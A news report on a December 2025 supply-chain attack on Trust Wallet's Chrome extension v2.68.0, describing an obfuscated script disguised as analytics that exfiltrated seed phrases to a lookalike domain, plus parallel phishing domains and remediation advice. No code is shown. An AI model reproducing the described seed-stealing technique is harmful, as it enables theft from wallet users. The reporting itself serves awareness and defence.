A major security incident has impacted Trust Wallet users, after a malicious update to the Chrome browser extension resulted in the theft of more than $7 million in cryptocurrency.
The breach was traced to Trust Wallet Chrome extension version 2.68.0, released on December 24, 2025, and affected hundreds of desktop users. Mobile wallet users were not impacted.
The incident highlights the growing risk of supply-chain attacks targeting browser-based crypto wallets, where automatic updates can silently introduce malicious code.
How the Attack Was Discovered
Renowned blockchain investigator ZachXBT was the first to publicly flag the incident on X, noting a sudden spike in unauthorized outflows shortly after users interacted with the updated extension.
By Christmas Eve, social media and community channels were flooded with reports of:
- Completely drained wallets
- Losses across ETH, BTC, SOL, and BNB
- Transactions routed to multiple attacker-controlled addresses
One victim reported losing $300,000 within minutes after approving a routine authorization request.
Blockchain security firm PeckShield initially estimated losses at $6 million. Trust Wallet later confirmed that approximately $7 million was stolen across hundreds of compromised wallets.
Supply-Chain Compromise Confirmed
Security firm SlowMist issued an alert suggesting a supply-chain attack, where malicious code was injected upstream and distributed through the official Chrome Web Store.
The timing strongly aligned with the extension update, confirming that version 2.68.0 was the sole affected release.
Malicious Code Analysis
Researchers analyzing the compromised bundle uncovered an obfuscated JavaScript file named 4482.js, disguised as a PostHog analytics component.
Key findings include:
- The script activated when users imported seed phrases
- It silently exfiltrated recovery phrases and wallet data
- Data was sent to
api.metrics-trustwallet.com, a domain:- Registered only days earlier
- Designed to mimic legitimate Trust Wallet infrastructure
- Unrelated to official Trust Wallet systems per WHOIS records
This mechanism allowed attackers to drain wallets immediately after seed import, without further user interaction.
Parallel Phishing Campaigns Increased Losses
Attackers also launched coordinated phishing operations to capitalize on panic:
- Fake domains like fix-trustwallet.com posed as “emergency fixes”
- Victims were prompted to re-enter seed phrases
- Wallets were drained instantly after submission
Investigators noted that multiple phishing domains shared the same registrar, indicating a well-organized and multi-pronged attack.
Trust Wallet’s Response
Trust Wallet acknowledged the breach on December 25, 2025, confirming:
- The issue was isolated to Chrome extension v2.68.0
- Users were urged to disable the extension immediately
- Version 2.69 was released as the only safe version
How Users Were Instructed to Respond
- Navigate to:
chrome://extensions/?id=egjidjbpglichdcondbcbdnbeeppgdph - Disable the Trust Wallet extension
- Enable Developer Mode
- Update to version 2.69
Trust Wallet also pledged to fully refund affected users, initiated direct support outreach, and warned users to ignore unofficial DMs or third-party “support” messages.
Industry Reaction and Ongoing Investigation
The incident drew attention from industry leaders, including Binance co-founder Changpeng Zhao, who hinted at possible insider involvement, further intensifying scrutiny of the wallet’s security practices.
The stolen funds span EVM chains, Bitcoin, and Solana, with attackers reportedly laundering assets through mixers, complicating recovery efforts.
What Users and Security Teams Should Do
Cybersecurity experts recommend immediate action for potentially exposed users:
- Assume all imported seed phrases are compromised
- Create new wallets with fresh seed phrases
- Transfer remaining funds immediately
- Avoid browser extensions for long-term storage
- Verify extension updates and permissions carefully
For developers and security teams, the breach reinforces the need for:
- Stronger extension supply-chain controls
- Reproducible builds and integrity verification
- Reduced reliance on auto-update mechanisms for sensitive software
Why This Breach Matters
This incident underscores a harsh reality:
Browser-based crypto wallets are high-value targets, and supply-chain compromises can bypass even cautious users.
With over $3 billion lost to crypto hacks in 2025, the Trust Wallet breach is a stark reminder that convenience and security often sit in tension—especially in decentralized ecosystems.
Trust Wallet’s refund process will be closely watched as a test of user trust following one of the most impactful wallet extension compromises to date.
Key Takeaways
- Trust Wallet Chrome extension v2.68.0 was compromised
- Over $7 million stolen across hundreds of wallets
- Malicious code exfiltrated seed phrases during import
- Parallel phishing campaigns amplified losses
- Users must upgrade to v2.69 and rotate compromised keys
